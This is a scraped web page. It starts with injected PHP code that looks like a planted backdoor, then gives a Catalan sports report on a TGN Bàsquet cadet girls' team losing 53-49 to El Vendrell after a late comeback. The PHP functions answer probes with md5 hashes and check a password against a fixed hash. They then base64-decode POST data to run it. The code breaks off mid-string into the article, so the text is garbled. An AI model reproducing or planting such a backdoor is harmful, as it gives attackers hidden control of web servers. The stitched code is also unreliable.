function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El cadet femení 1 remunta 13 punts però falla el tir decisiu per forçar la pròrroga contra el Vendrell (53-49) - Tgn Bàsquet Club -

El cadet femení 1 remunta 13 punts però falla el tir decisiu per forçar la pròrroga contra el Vendrell (53-49)

Updated: febrer 2, 2016

El cadet femení 1 va estar a punt de guanyar un partit que perdia per 15 punts a 5 minuts del final (47-32) en una demostració de fe, treball i ganes digna de destacar. Les noies que entrena Laureà Català, molt inferiors físicament al seu rival, van mantenir un to defensiu molt bo durant tot el partit i només les pèrdues de pilota i les errades en tirs sota cistella -intimidació de les pivots locals- li van impedir estar més a prop del seu rival durant el matx, un fet que li hauria donat més possibilitats de triomf.

Així, i des de la defensa, el TGN Bàsquet va superar els seus problemes ofensius (28-23 al descans). Els problemes en les transicions ofensives i les impresicions en la passada van permetre El Vendrell dominar amb certa comoditat (47-32) però la intensitat defensiva visitant va permetre fer un parcial de 0-8 primer i, tot i arribar a l’últim minut amb un desavantatge de 8 punts (51-43), el treball lila li va permetre arribar al 51-49 a 20 segons del final i posessió de pilota. El tir no va entrar, les tarragonines van reclamar falta en el rebot que els àrbitres no van concedir i la victòria va ser per les locals.